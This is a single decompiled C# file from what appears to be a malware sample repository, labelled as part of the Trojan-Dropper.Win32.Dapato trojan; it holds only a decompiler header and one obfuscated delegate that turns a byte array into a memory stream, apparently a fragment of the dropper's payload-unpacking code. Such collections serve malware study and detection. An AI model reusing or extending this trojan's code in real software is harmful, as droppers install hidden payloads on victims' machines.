MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e/昇ⳃ咼缀䖑剪.cs
2022-08-18 06:28:56 -05:00

10 lines
480 B
C#

// Decompiled with JetBrains decompiler
// Type: 昇ⳃ咼缀䖑剪
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
using System.IO;
internal delegate MemoryStream \uE18E昇\uE062ⳃ咼缀䖑剪(byte[] _param1);